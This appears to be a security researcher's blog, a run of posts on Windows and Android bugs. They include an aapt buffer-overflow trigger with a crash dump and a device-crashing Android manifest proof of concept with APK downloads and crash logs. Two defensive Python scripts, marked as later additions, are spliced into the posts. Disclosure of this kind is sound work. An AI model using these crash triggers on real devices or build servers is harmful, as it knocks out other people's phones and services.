Baliç Bilişim Website and Training Content Renewed

Hello,

Baliç Bilişim's website and training content have been renewed.

www.balicbilisim.com

Courses: Android Fundamentals, Android Malware Analysis, Android Forensics, Mac OS X and iOS Fundamentals, Web Penetration Testing, Mobile Penetration Testing, Linux Fundamentals.

Windows Directory Bug

Hi Guys,

I’d like to share a weird story with you.

Today, I found this interesting bug/issue in Windows OS. Earlier I tested on Windows 8.1 (x64), Windows 7 (x64) and Windows Server 2008 R2 (x64). I think it is present in all versions of Windows.

However, I'm not certain why this issue occurs, but I think it might be related to NTFS.

Due to this issue the created folders cannot be deleted.

mkdir "test /. /test"

[screenshots: windows_1, windows_2, windows_3, windows_4]

If you create a file in the folder, the same file gets created in both folders; also, if either folder is deleted, the remaining file gets corrupted.

[screenshots: windows_5, windows_6]
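A filesystem hygiene check for the kind of entry described in this post, added here as an example; it is not part of the original post. It rests on my own assumption, not the author's finding: that the folders which cannot be deleted have names ending in a space or a dot (as "test " from the quoted mkdir command would), which the Win32 path layer strips before opening a path, so Explorer and del end up addressing a different name. Reserved device names are flagged for the same reason. The function names and the sample listing are constructed.

```python
"""Audit directory entries for names Win32 path normalisation cannot address.

Added example, not code from the original post. Assumption: undeletable
folders are entries whose name ends in a space or dot, or is a reserved
device name; both are stripped or redirected by the Win32 path layer, so
ordinary tools never reach the real entry. The script only reports.
"""
import os
import re

# Win32 reserved device names; "NUL.txt" is still treated as the NUL device.
RESERVED = ({"CON", "PRN", "AUX", "NUL"}
            | {"COM%d" % i for i in range(1, 10)}
            | {"LPT%d" % i for i in range(1, 10)})

# Characters Win32 never allows in a component (control chars included).
FORBIDDEN_RE = re.compile(r'[<>:"/\\|?*\x00-\x1f]')


def classify_name(name):
    """Return a reason string if `name` is a non-canonical Win32 name, else None."""
    if name != name.rstrip(" ."):
        return "trailing space or dot"
    if name.split(".")[0].upper() in RESERVED:
        return "reserved device name"
    if FORBIDDEN_RE.search(name):
        return "character not allowed by Win32"
    return None


def find_noncanonical(names):
    """Reduce an iterable of bare entry names to (name, reason) pairs."""
    hits = []
    for name in names:
        reason = classify_name(name)
        if reason:
            hits.append((name, reason))
    return hits


def scan_tree(root):
    """Walk `root` and return (full_path, reason) for every suspicious entry."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            reason = classify_name(name)
            if reason:
                hits.append((os.path.join(dirpath, name), reason))
    return hits


# Constructed sample listing, shaped like what os.listdir() returns on Windows.
SAMPLE_NAMES = ["test", "test ", "report.", "NUL.txt", "notes.txt", "com1"]

if __name__ == "__main__":
    for name, reason in find_noncanonical(SAMPLE_NAMES):
        print("%r: %s" % (name, reason))
```

scan_tree() walks a real directory and reports; it deliberately deletes nothing, since an entry like this has to be addressed through the extended-length `\\?\` path form rather than through the normalised name.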

Cyber Security Conference 2014 Istanbul

Cyber security, which has left its mark on the world in recent years and whose importance against threats from cyberspace is felt ever more strongly, together with policies for training cyber spies, cyber wars and the considerable sums that countries now set aside from their budgets for this field, has made the concept of cyber security critically important for individual, corporate and national security. The Cyber Security Conference, organised by the Cyber Security Association (Siber Güvenlik Derneği), aims to offer proposed solutions to the questions and problems on this axis.

http://www.siberguvenlikkonferansi.org/

New generation brute force attacks

Hi guys,

Soon I will be sharing a method for brute force attacks. I tested it on most of the big companies (Apple, Google, Microsoft etc.) and it worked well. I tried over 20,000 password attempts on an account and there seemed to be no problem occurring.

I have reported these issues to Google and Apple, so I will be sharing this information when I get a reply from those companies and when it's fixed. (I will not report to Microsoft because they gave me a bad experience in the past..)

I believe that many other companies' systems have the same issue, which must be fixed as soon as possible.

For now I only have a response from Google; I will publish it when I hear from Apple.

[screenshot: googlePermissions]

Android Training

Hello friends,

Our Android OS & Android application development training continues.

Training dates:
Saturday 26 April – Sunday 27 April 2014 (1st class)
Training venue:
Atalar (Kartal) / İstanbul
Participation fee:
700 TL (1 person)

Contact:
ibrahim@balicbilisim.com
+90216 387 87 99
+90538 722 33 73

1. Overview of Android
2. What is Android?
3. Android Architecture
  3.1 Android Internals
    • Applications
    • Application Framework
    • Libraries
    • Android Runtime (Core Libraries & Dalvik & ART)
    • Linux Kernel
  3.2 Android APIs
    • PackageManager
    • Power Manager
    • Activity Manager
    • Alarm Manager
    • Window Manager
    • Bluetooth Service
    • Location Manager
    • Telephony Manager
    • …
  3.3 Android Data Storage
    • Internal Storage
    • External Storage
    • Shared Preferences
    • Network
    • SQLite
    • …
4. Lab Environment Setup & Configuration
  4.1 Environment Tools
    • Android SDK
    • Eclipse
    • IntelliJ IDEA
  4.2 Android Tools & Debugging
    • Android Debug Bridge (adb)
    • Android Asset Packaging Tool (aapt)
    • Dalvik Debug Monitor Server (ddms)
    • Network Traffic Analysis
    • Logcat, Dumpsys
5. Exercises
  5.1 Developing 3 applications
  5.2 Analysing 3 applications

* Students attending the training will receive a 40% discount on the participation fee, provided they come with their ID cards.
** We have one free student place per class (for friends who are not financially well off).
*** Participants must bring a laptop with a Windows operating system installed.

Supposedly Apple and Google Denied It?

Certain people have been running a smear campaign against my name for a long time. They write and scribble false and wrong things about what I have done, without citing any source. I only laugh at them.

First of all, regarding Apple, I want to state clearly that Apple has made no official statement on the matter, whether "good" or "bad".

As its procedure requires, Apple officially lists only on this page, http://support.apple.com/kb/ht1318, the names of those who reported the relevant vulnerabilities and the type of vulnerability.

It is not me saying this, it is Apple:

2013-07-29 iCloud.com/mail

A stored cross-site scripting issue was addressed. We would like to acknowledge Ibrahim BALIC (Balich IT – www.balicbilisim.com) for reporting this issue.

2013-07-25 developer.apple.com

A stored cross-site scripting issue was addressed. We would like to acknowledge Ibrahim BALIC (Balich IT – www.balicbilisim.com) for reporting this issue.

2013-07-25 itunesconnect.apple.com

Nine stored cross-site scripting issues were addressed. We would like to acknowledge Ibrahim BALIC (Balich IT – www.balicbilisim.com) for reporting these issues.

2013-07-23 iCloud.com/calendar

A stored cross-site scripting issue was addressed. We would like to acknowledge Ibrahim BALIC (Balich IT – www.balicbilisim.com) for reporting this issue.

2013-07-22 iadworkbench.apple.com

An information disclosure issue was addressed. We would like to acknowledge Ibrahim BALIC (Balich IT – www.balicbilisim.com) for reporting this issue.

These days the same people have started the same smear campaign regarding Google.
For God's sake, I ask them to tell me: where has Google made these statements? Let them just show me a source…

Everyone remembers very well that it was not me but Apple itself that announced the incident, and in those days Apple itself sent the following email to its own users.

[screenshot: appleolayi]

As is clearly seen here, Apple stated that in the incident in question the application developers' names, surnames, email IDs and Apple IDs had been accessed and that passwords were secure.

I said none of this; Apple itself reported it.

I shared the incident and all the documents I obtained during this process in this video.

As is clearly seen in this video too, you can plainly see the names, surnames and Apple IDs that I obtained in connection with the matter.

But some malicious people, especially without citing any source and without offering any reasonable explanation, are running a smear campaign against my name. In their statements they claim that Apple denied the situation. If they have such an official source, they need to share it with everyone; otherwise there is no reasonable explanation for making such claims without citing a source.

Again, some people, without citing a source, state that this incident stemmed from code execution. If you knew what could be done with a code execution vulnerability, rest assured, they would know very well that on a server where code execution has been achieved one would not take only users' names, surnames and email addresses. (unless Apple stores user data as plain text inside a text file… lol)

Achieving code execution means being able to run code on that server. Of course such vulnerabilities can be very dangerous, but the person who achieves it can take control of the entire server; they don't just take names, surnames, email addresses etc.

Just as the Apple incident had passed and the jealousy of those doing the smearing had subsided, they went rabid again over the Google incident; they say Google denied the incident… For God's sake, where and when did Google make a statement? What did it say? Let them explain so the whole world knows.

Google has made no official statement on the matter other than "the issues have been resolved".

https://support.google.com/googleplay/android-developer/known-issues/24493?hl=en

It only stated that the relevant issues had been resolved; beyond that no statement was made. I laid out the matter and all the evidence related to it.

You can clearly see the vulnerability report I made to Google, its report ID and date here.

[screenshot: asdasdas]

You can see the start date of the events and the comments people wrote here:

https://code.google.com/p/android/issues/detail?id=67226

I am here for anyone who would prove or claim otherwise, but the false and wrong attacks they make without citing any source have one and only one purpose, and that is to smear.

İbrahim

Android Asset Packaging Tool (aapt) BoF

Hi guys,

I've discovered a vulnerability in aapt (Android Asset Packaging Tool) which causes a possible memory corruption.

The cause of the bug is the length of a namespace attribute value, e.g.: android:sharedUserLabel="22007+ chars"

If you set any attribute value in AndroidManifest.xml to a very long value (22007+ chars) and try to compile your project with aapt, it triggers the bug.

Command line:
aapt package -v -f -M [Projectpath]\AndroidManifest.xml -S [projectpath]\res -I [AndroidSDK]\platforms\android-19\android.jar -F [Projectpath]\AndroidTest.apk

[screenshot: afafa]

If you define the value of any entry in AndroidManifest.xml (as an example I used "android:sharedUserLabel=") as 22007+ characters or more and try to compile this project with aapt, you can trigger the bug.

If you can exploit it, you might have a chance to try it on servers that do online compiling ( :

(for example http://appinventor.mit.edu/explore/ )

[screenshot: mit]

Crash summary:

eax=002ed209 ebx=0028e9c4 ecx=0005e800 edx=002ed20a esi=0028f384 edi=0005e846
eip=00435837 esp=0028e9b0 ebp=0028ede8 iopl=0 nv up ei ng nz ac pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010297
aapt+0x35837:
00435837 807aff0a cmp byte ptr [edx-1],0Ah ds:002b:002ed209=??
0:000> ub .
aapt+0x35822:
00435822 53 push ebx
00435823 e8a8760500 call aapt+0x8ced0 (0048ced0)
00435828 89c7 mov edi,eax
0043582a 83c410 add esp,10h
0043582d 8d1403 lea edx,[ebx+eax]
00435830 8d42ff lea eax,[edx-1]
00435833 39c3 cmp ebx,eax
00435835 731a jae aapt+0x35851 (00435851)
0:000> ub 0028e9c4
0028e9bc 61 popad
0028e9bd 61 popad
0028e9be 61 popad
0028e9bf 61 popad
0028e9c0 61 popad
0028e9c1 61 popad
0028e9c2 61 popad
0028e9c3 61 popad

Android malformed APK DoS – Part II

Hi Guys,

I found a new DoS technique for Android devices.

Many services continuously shut down:

  • Launcher Service
  • Google Play Service
  • AOSP Android Keyboard
  • android.process.acore

The cause of the bug is the length of the "android:sharedUserLabel" and "android:versionName" namespace attributes in AndroidManifest.xml.

If you set "longstring" in strings.xml to a very long value (2322480+ chars), it triggers the bug.

<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.balicit.GooglePlayServiceDoS"
    android:sharedUserLabel="@string/longstring"
    android:versionCode="1"
    android:versionName="@string/longstring">
    <uses-sdk android:minSdkVersion="7"/>
    <application android:label="@string/app_name" android:icon="@drawable/ic_launcher">
        <activity android:name="MyActivity"
            android:label="@string/app_name">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
    </application>
</manifest>

If you want to test, install this app and run it on your Android device.

Download Unsigned Apk

Download Signed Apk

I/ActivityManager(14833): START {flg=0x10000000 cmp=com.balicit.GooglePlayServiceDoS/.MyActivity u=0} from pid 26385
D/AndroidRuntime(26385): Shutting down VM
D/dalvikvm(26398): Late-enabling CheckJNI
D/dalvikvm(26385): GC_CONCURRENT freed 102K, 81% free 494K/2560K, paused 1ms+1ms, total 6ms
D/dalvikvm(26385): Debugger has detached; object registry had 1 entries
I/ActivityManager(14833): Start proc com.balicit.GooglePlayServiceDoS for activity com.balicit.GooglePlayServiceDoS/.MyActivity: pid=26398 uid=10088 gids={1015, 1028}
I/AndroidRuntime(26385): NOTE: attach of thread 'Binder_3' failed
E/Trace (26398): error opening trace file: No such file or directory (2)
E/JavaBinder(26398): !!! FAILED BINDER TRANSACTION !!!
D/AndroidRuntime(26398): Shutting down VM
W/dalvikvm(26398): threadid=1: thread exiting with uncaught exception (group=0x40d782a0)
E/AndroidRuntime(26398): FATAL EXCEPTION: main
E/AndroidRuntime(26398): java.lang.AssertionError: android.os.TransactionTooLargeException
E/AndroidRuntime(26398): at android.app.LoadedApk.initializeJavaContextClassLoader(LoadedApk.java:363)
E/AndroidRuntime(26398): at android.app.LoadedApk.getClassLoader(LoadedApk.java:320)
E/AndroidRuntime(26398): at android.app.LoadedApk.makeApplication(LoadedApk.java:493)
E/AndroidRuntime(26398): at android.app.ActivityThread.handleBindApplication(ActivityThread.java:4124)
E/AndroidRuntime(26398): at android.app.ActivityThread.access$1300(ActivityThread.java:130)
E/AndroidRuntime(26398): at android.app.ActivityThread$H.handleMessage(ActivityThread.java:1255)
E/AndroidRuntime(26398): at android.os.Handler.dispatchMessage(Handler.java:99)
E/AndroidRuntime(26398): at android.os.Looper.loop(Looper.java:137)
E/AndroidRuntime(26398): at android.app.ActivityThread.main(ActivityThread.java:4745)
E/AndroidRuntime(26398): at java.lang.reflect.Method.invokeNative(Native Method)
E/AndroidRuntime(26398): at java.lang.reflect.Method.invoke(Method.java:511)
E/AndroidRuntime(26398): at com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:786)
E/AndroidRuntime(26398): at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:553)
E/AndroidRuntime(26398): at dalvik.system.NativeStart.main(Native Method)
E/AndroidRuntime(26398): Caused by: android.os.TransactionTooLargeException
E/AndroidRuntime(26398): at android.os.BinderProxy.transact(Native Method)
E/AndroidRuntime(26398): at android.content.pm.IPackageManager$Stub$Proxy.getPackageInfo(IPackageManager.java:1343)
E/AndroidRuntime(26398): at android.app.LoadedApk.initializeJavaContextClassLoader(LoadedApk.java:361)
E/AndroidRuntime(26398): ... 13 more
W/ActivityManager(14833): Force finishing activity com.balicit.GooglePlayServiceDoS/.MyActivity
I/Icing (26147): Internal init done: storage state 0
I/Icing (26147): Post-init done
E/JavaBinder(26147): !!! FAILED BINDER TRANSACTION !!!
W/dalvikvm(26147): threadid=14: thread exiting with uncaught exception (group=0x40d782a0)
E/AndroidRuntime(26147): FATAL EXCEPTION: Thread-1029
E/AndroidRuntime(26147): java.lang.RuntimeException: Package manager has died
E/AndroidRuntime(26147): at android.app.ApplicationPackageManager.getPackageInfo(ApplicationPackageManager.java:77)
E/AndroidRuntime(26147): at ecn.a(SourceFile:75)
E/AndroidRuntime(26147): at eaa.j(SourceFile:2010)
E/AndroidRuntime(26147): at eae.a(SourceFile:1958)
E/AndroidRuntime(26147): at eba.run(SourceFile:321)
E/AndroidRuntime(26147): at android.os.Handler.handleCallback(Handler.java:615)
E/AndroidRuntime(26147): at android.os.Handler.dispatchMessage(Handler.java:92)
E/AndroidRuntime(26147): at android.os.Looper.loop(Looper.java:137)
E/AndroidRuntime(26147): at dzm.run(SourceFile:38)
E/AndroidRuntime(26147): Caused by: android.os.TransactionTooLargeException
E/AndroidRuntime(26147): at android.os.BinderProxy.transact(Native Method)
E/AndroidRuntime(26147): at android.content.pm.IPackageManager$Stub$Proxy.getPackageInfo(IPackageManager.java:1343)
E/AndroidRuntime(26147): at android.app.ApplicationPackageManager.getPackageInfo(ApplicationPackageManager.java:72)
E/AndroidRuntime(26147): ... 8 more
W/ActivityManager(14833): Activity pause timeout for ActivityRecord{41491e20 com.balicit.GooglePlayServiceDoS/.MyActivity}
I/ActivityManager(14833): START {act=android.intent.action.MAIN cat=[android.intent.category.HOME] flg=0x10000000 cmp=com.android.launcher/com.android.launcher2.Launcher u=0} from pid 0
D/dalvikvm(26317): GC_CONCURRENT freed 1357K, 13% free 10139K/11591K, paused 9ms+11ms, total 74ms
I/ActivityManager(14833): Displayed com.android.launcher/com.android.launcher2.Launcher: +424ms (total +1s176ms)
D/audio_hw_primary(14704): out_standby(0x4008d388)
D/audio_hw_primary(14704): do_output_standby(0x4008d388)
I/wpa_supplicant( 3904): [CTRL_IFACE]wlan0: SIGNAL_POLL
I/Process (26147): Sending signal. PID: 26147 SIG: 9
D/audio_hw_primary(14704): select_output_device(mode=0, devices=0x40002)
D/audio_hw_primary(14704): ~~~~ select_output_device : hs=0 , hp=0, sp=2
D/audio_hw_primary(14704): speaker_on
D/audio_hw_primary(14704): start_output_stream(adev->devices=0x40002, adev->mode=0)
D/audio_hw_primary(14704): ------------open on board audio-------
I/ActivityManager(14833): Process com.google.android.gms (pid 26147) has died.
W/ActivityManager(14833): Scheduling restart of crashed service com.google.android.gms/.playlog.service.PlayLogBrokerService in 5000ms
W/ActivityManager(14833): Scheduling restart of crashed service com.google.android.gms/.icing.service.IndexWorkerService in 14998ms
I/Process (26398): Sending signal. PID: 26398 SIG: 9
I/ActivityManager(14833): Process com.balicit.GooglePlayServiceDoS (pid 26398) has died.
I/Process (26317): Sending signal. PID: 26317 SIG: 9
I/WindowState(14833): WIN DEATH: Window{419e9908 com.android.launcher/com.android.launcher2.Launcher paused=false}
W/InputDispatcher(14833): channel '419e9908 com.android.launcher/com.android.launcher2.Launcher (server)' ~ Consumer closed input channel or an error occurred. events=0x9
E/InputDispatcher(14833): channel '419e9908 com.android.launcher/com.android.launcher2.Launcher (server)' ~ Channel is unrecoverably broken and will be disposed!
I/ActivityManager(14833): Process com.android.launcher (pid 26317) has died.
W/InputDispatcher(14833): Attempted to unregister already unregistered input channel '419e9908 com.android.launcher/com.android.launcher2.Launcher (server)'
I/WindowManager(14833): WINDOW DIED Window{419e9908 com.android.launcher/com.android.launcher2.Launcher paused=false}
I/ActivityManager(14833): Start proc com.android.launcher for activity com.android.launcher/com.android.launcher2.Launcher: pid=26419 uid=10038 gids={1028}
E/Trace (26419): error opening trace file: No such file or directory (2)
I/ActivityThread(26419): Pub com.android.launcher2.settings: com.android.launcher2.LauncherProvider
D/dalvikvm(26419): GC_FOR_ALLOC freed 175K, 5% free 6260K/6535K, paused 12ms, total 12ms
D/dalvikvm(26419): GC_CONCURRENT freed 274K, 6% free 6448K/6791K, paused 1ms+2ms, total 14ms
I/wpa_supplicant( 3904): [CTRL_IFACE]wlan0: SIGNAL_POLL
D/dalvikvm(26419): GC_CONCURRENT freed 234K, 5% free 6728K/7047K, paused 5ms+13ms, total 70ms
D/libEGL (26419): loaded /system/lib/egl/libEGL_mali.so
D/libEGL (26419): loaded /system/lib/egl/libGLESv1_CM_mali.so
D/libEGL (26419): loaded /system/lib/egl/libGLESv2_mali.so
D/OpenGLRenderer(26419): Enabling debug mode 0
W/InputMethodManagerService(14833): Got RemoteException sending setActive(false) notification to pid 26317 uid 10038
D/dalvikvm(26419): GC_CONCURRENT freed 228K, 5% free 6917K/7239K, paused 2ms+2ms, total 17ms
I/ActivityManager(14833): Displayed com.android.launcher/com.android.launcher2.Launcher: +1s55ms
W/System.err(14833): android.os.DeadObjectException
W/System.err(14833): at android.os.BinderProxy.transact(Native Method)
W/System.err(14833): at com.android.internal.widget.IRemoteViewsAdapterConnection$Stub$Proxy.onServiceDisconnected(IRemoteViewsAdapterConnection.java:101)
W/System.err(14833): at com.android.server.AppWidgetServiceImpl$ServiceConnectionProxy.disconnect(AppWidgetServiceImpl.java:150)
W/System.err(14833): at com.android.server.AppWidgetServiceImpl.bindRemoteViewsService(AppWidgetServiceImpl.java:643)
W/System.err(14833): at com.android.server.AppWidgetService.bindRemoteViewsService(AppWidgetService.java:230)
W/System.err(14833): at com.android.internal.appwidget.IAppWidgetService$Stub.onTransact(IAppWidgetService.java:315)
W/System.err(14833): at android.os.Binder.execTransact(Binder.java:367)
W/System.err(14833): at dalvik.system.NativeStart.run(Native Method)
D/dalvikvm(26419): GC_CONCURRENT freed 37K, 2% free 7355K/7495K, paused 3ms+3ms, total 31ms
D/dalvikvm(25526): GC_FOR_ALLOC freed 353K, 9% free 6244K/6855K, paused 22ms, total 22ms
D/dalvikvm(25526): GC_FOR_ALLOC freed 298K, 9% free 6255K/6855K, paused 17ms, total 18ms
D/dalvikvm(26419): GC_CONCURRENT freed 29K, 2% free 7845K/7943K, paused 3ms+2ms, total 32ms
D/dalvikvm(26419): WAIT_FOR_CONCURRENT_GC blocked 12ms
D/dalvikvm(26419): WAIT_FOR_CONCURRENT_GC blocked 6ms
D/dalvikvm(25526): GC_FOR_ALLOC freed 302K, 9% free 6248K/6855K, paused 11ms, total 11ms
D/dalvikvm(26419): GC_CONCURRENT freed 49K, 2% free 8334K/8455K, paused 2ms+4ms, total 28ms
D/dalvikvm(25526): GC_FOR_ALLOC freed 327K, 9% free 6255K/6855K, paused 11ms, total 12ms
D/dalvikvm(25526): GC_FOR_ALLOC freed 346K, 9% free 6261K/6855K, paused 16ms, total 17ms
D/dalvikvm(26419): GC_CONCURRENT freed 54K, 2% free 8974K/9095K, paused 1ms+3ms, total 21ms
W/System.err(14833): android.os.DeadObjectException
W/System.err(14833): at android.os.BinderProxy.transact(Native Method)
W/System.err(14833): at com.android.internal.widget.IRemoteViewsAdapterConnection$Stub$Proxy.onServiceDisconnected(IRemoteViewsAdapterConnection.java:101)
W/System.err(14833): at com.android.server.AppWidgetServiceImpl$ServiceConnectionProxy.disconnect(AppWidgetServiceImpl.java:150)
W/System.err(14833): at com.android.server.AppWidgetServiceImpl.bindRemoteViewsService(AppWidgetServiceImpl.java:643)
W/System.err(14833): at com.android.server.AppWidgetService.bindRemoteViewsService(AppWidgetService.java:230)
W/System.err(14833): at com.android.internal.appwidget.IAppWidgetService$Stub.onTransact(IAppWidgetService.java:315)
W/System.err(14833): at android.os.Binder.execTransact(Binder.java:367)
W/System.err(14833): at dalvik.system.NativeStart.run(Native Method)
E/RemoteViewsAdapter(26419): Error in updateRemoteViews(9): null RemoteViews returned from RemoteViewsFactory.
E/RemoteViewsAdapter(26419): Error in updateRemoteViews(0): null RemoteViews returned from RemoteViewsFactory.
E/RemoteViewsAdapter(26419): Error in updateRemoteViews(1): null RemoteViews returned from RemoteViewsFactory.
E/RemoteViewsAdapter(26419): Error in updateRemoteViews(2): null RemoteViews returned from RemoteViewsFactory.
E/RemoteViewsAdapter(26419): Error in updateRemoteViews(3): null RemoteViews returned from RemoteViewsFactory.
E/RemoteViewsAdapter(26419): Error in updateRemoteViews(4): null RemoteViews returned from RemoteViewsFactory.
E/RemoteViewsAdapter(26419): Error in updateRemoteViews(5): null RemoteViews returned from RemoteViewsFactory.
E/RemoteViewsAdapter(26419): Error in updateRemoteViews(6): null RemoteViews returned from RemoteViewsFactory.
E/RemoteViewsAdapter(26419): Error in updateRemoteViews(7): null RemoteViews returned from RemoteViewsFactory.
E/RemoteViewsAdapter(26419): Error in updateRemoteViews(8): null RemoteViews returned from RemoteViewsFactory.
E/RemoteViewsAdapter(26419): Error in updateRemoteViews(0): null RemoteViews returned from RemoteViewsFactory.
E/RemoteViewsAdapter(26419): Error in updateRemoteViews(1): null RemoteViews returned from RemoteViewsFactory.
E/RemoteViewsAdapter(26419): Error in updateRemoteViews(2): null RemoteViews returned from RemoteViewsFactory.
E/RemoteViewsAdapter(26419): Error in updateRemoteViews(3): null RemoteViews returned from RemoteViewsFactory.
D/dalvikvm(26419): GC_FOR_ALLOC freed 663K, 9% free 9181K/9991K, paused 16ms, total 16ms
I/dalvikvm-heap(26419): Grow heap (frag case) to 10.011MB for 1048592-byte allocation
D/dalvikvm(26419): GC_CONCURRENT freed 21K, 9% free 10184K/11079K, paused 2ms+3ms, total 25ms
D/dalvikvm(26419): GC_CONCURRENT freed 1842K, 17% free 9714K/11655K, paused 2ms+2ms, total 21ms
D/dalvikvm(26419): WAIT_FOR_CONCURRENT_GC blocked 4ms
D/dalvikvm(26419): GC_FOR_ALLOC freed 231K, 16% free 9808K/11655K, paused 15ms, total 15ms
D/dalvikvm(26419): GC_CONCURRENT freed 1065K, 16% free 9894K/11655K, paused 3ms+4ms, total 29ms
D/dalvikvm(26419): WAIT_FOR_CONCURRENT_GC blocked 6ms
E/JavaBinder(26419): !!! FAILED BINDER TRANSACTION !!!
W/dalvikvm(26419): threadid=10: thread exiting with uncaught exception (group=0x40d782a0)
D/dalvikvm(26419): GC_CONCURRENT freed 1103K, 15% free 9976K/11655K, paused 3ms+5ms, total 122ms
E/AndroidRuntime(26419): FATAL EXCEPTION: launcher-loader
E/AndroidRuntime(26419): java.lang.RuntimeException: Package manager has died
E/AndroidRuntime(26419): at android.app.ApplicationPackageManager.getPackageInfo(ApplicationPackageManager.java:77)
E/AndroidRuntime(26419): at com.android.launcher2.ApplicationInfo.<init>(ApplicationInfo.java:88)
E/AndroidRuntime(26419): at com.android.launcher2.LauncherModel$LoaderTask.loadAllAppsByBatch(LauncherModel.java:1773)
E/AndroidRuntime(26419): at com.android.launcher2.LauncherModel$LoaderTask.loadAndBindAllApps(LauncherModel.java:1665)
E/AndroidRuntime(26419): at com.android.launcher2.LauncherModel$LoaderTask.run(LauncherModel.java:979)
E/AndroidRuntime(26419): at android.os.Handler.handleCallback(Handler.java:615)
E/AndroidRuntime(26419): at android.os.Handler.dispatchMessage(Handler.java:92)
E/AndroidRuntime(26419): at android.os.Looper.loop(Looper.java:137)
E/AndroidRuntime(26419): at android.os.HandlerThread.run(HandlerThread.java:60)
E/AndroidRuntime(26419): Caused by: android.os.TransactionTooLargeException
E/AndroidRuntime(26419): at android.os.BinderProxy.transact(Native Method)
E/AndroidRuntime(26419): at android.content.pm.IPackageManager$Stub$Proxy.getPackageInfo(IPackageManager.java:1343)
E/AndroidRuntime(26419): at android.app.ApplicationPackageManager.getPackageInfo(ApplicationPackageManager.java:72)
E/AndroidRuntime(26419): ... 8 more
W/ActivityManager(14833): Force finishing activity com.android.launcher/com.android.launcher2.Launcher
I/ActivityManager(14833): START {act=android.intent.action.MAIN cat=[android.intent.category.HOME] flg=0x10000000 cmp=com.android.launcher/com.android.launcher2.Launcher u=0} from pid 0
D/audio_hw_primary(14704): out_standby(0x4008d388)
D/audio_hw_primary(14704): do_output_standby(0x4008d388)
I/ActivityManager(14833): Displayed com.android.launcher/com.android.launcher2.Launcher: +393ms
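The logcat above is long, and the useful signal in it is that three unrelated processes (the test app, com.google.android.gms and the launcher) all die with the same root cause, android.os.TransactionTooLargeException, on a package-manager call. The triage script below is an added example, not code from the original post: it parses logcat lines, groups FATAL EXCEPTION / Caused by / "has died" events by pid, and lists the processes whose crash shares that root cause. The function names are my own and the sample lines are a constructed subset of the capture quoted above.

```python
"""Triage a logcat capture for crashes that share one binder-size root cause.

Added example, not code from the original post. Parses "L/Tag(pid): message"
logcat lines and reports, per pid, the crashed thread, the root cause and
whether the process was later reported dead by ActivityManager.
"""
import re

LOGCAT_RE = re.compile(
    r"^(?P<level>[VDIWEF])/(?P<tag>.+?)\s*\(\s*(?P<pid>\d+)\):\s?(?P<msg>.*)$")
START_PROC_RE = re.compile(r"Start proc (\S+) for .*?pid=(\d+)")
DIED_RE = re.compile(r"Process (\S+) \(pid (\d+)\) has died")

# Constructed sample: a subset of the lines in the logcat quoted above.
SAMPLE_LOGCAT = [
    "I/ActivityManager(14833): Start proc com.balicit.GooglePlayServiceDoS for activity com.balicit.GooglePlayServiceDoS/.MyActivity: pid=26398 uid=10088 gids={1015, 1028}",
    "E/Trace (26398): error opening trace file: No such file or directory (2)",
    "E/JavaBinder(26398): !!! FAILED BINDER TRANSACTION !!!",
    "E/AndroidRuntime(26398): FATAL EXCEPTION: main",
    "E/AndroidRuntime(26398): java.lang.AssertionError: android.os.TransactionTooLargeException",
    "E/AndroidRuntime(26398): Caused by: android.os.TransactionTooLargeException",
    "E/JavaBinder(26147): !!! FAILED BINDER TRANSACTION !!!",
    "E/AndroidRuntime(26147): FATAL EXCEPTION: Thread-1029",
    "E/AndroidRuntime(26147): java.lang.RuntimeException: Package manager has died",
    "E/AndroidRuntime(26147): Caused by: android.os.TransactionTooLargeException",
    "I/ActivityManager(14833): Process com.google.android.gms (pid 26147) has died.",
    "I/ActivityManager(14833): Process com.balicit.GooglePlayServiceDoS (pid 26398) has died.",
    "I/ActivityManager(14833): Start proc com.android.launcher for activity com.android.launcher/com.android.launcher2.Launcher: pid=26419 uid=10038 gids={1028}",
    "E/JavaBinder(26419): !!! FAILED BINDER TRANSACTION !!!",
    "E/AndroidRuntime(26419): FATAL EXCEPTION: launcher-loader",
    "E/AndroidRuntime(26419): Caused by: android.os.TransactionTooLargeException",
    "I/wpa_supplicant( 3904): [CTRL_IFACE]wlan0: SIGNAL_POLL",
]


def parse_logcat_line(line):
    """Split one logcat line into level, tag, pid and message; None if it does not match."""
    m = LOGCAT_RE.match(line)
    if not m:
        return None
    return {"level": m.group("level"), "tag": m.group("tag").strip(),
            "pid": int(m.group("pid")), "msg": m.group("msg")}


def _new_record():
    return {"process": None, "thread": None, "cause": None, "died": False}


def summarize_logcat(lines):
    """Return {pid: {process, thread, cause, died}} for every crashed or dead pid."""
    names = {}    # pid -> process name, learned from ActivityManager lines
    crashes = {}  # pid -> crash record
    for line in lines:
        rec = parse_logcat_line(line)
        if rec is None:
            continue
        msg = rec["msg"]
        m = START_PROC_RE.search(msg)
        if m:
            names[int(m.group(2))] = m.group(1)
            continue
        m = DIED_RE.search(msg)
        if m:
            pid = int(m.group(2))
            names[pid] = m.group(1)
            crashes.setdefault(pid, _new_record())["died"] = True
            continue
        if rec["tag"] != "AndroidRuntime":
            continue
        if msg.startswith("FATAL EXCEPTION: "):
            crashes.setdefault(rec["pid"], _new_record())["thread"] = msg[len("FATAL EXCEPTION: "):]
        elif msg.startswith("Caused by: "):
            # The root cause is the last "Caused by:" line of the pid's trace.
            crashes.setdefault(rec["pid"], _new_record())["cause"] = msg[len("Caused by: "):]
    for pid, record in crashes.items():
        record["process"] = names.get(pid, "pid %d" % pid)
    return crashes


def binder_size_victims(lines):
    """Sorted process names whose crash root cause was TransactionTooLargeException."""
    return sorted(record["process"] for record in summarize_logcat(lines).values()
                  if record["cause"] and "TransactionTooLargeException" in record["cause"])


if __name__ == "__main__":
    for pid, record in sorted(summarize_logcat(SAMPLE_LOGCAT).items()):
        print(pid, record)
    print("shared root cause:", binder_size_victims(SAMPLE_LOGCAT))
```

When more than one process shows up in binder_size_victims(), the fault is in the data they all fetch over binder (here the package record of the installed app) rather than in each victim, which is the distinction that matters when triaging the crash reports this kind of package produces.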

Android Vulnerability affected Google Play Bouncer (Emulator)

Hi all,
I’d like to share a funny story with you.

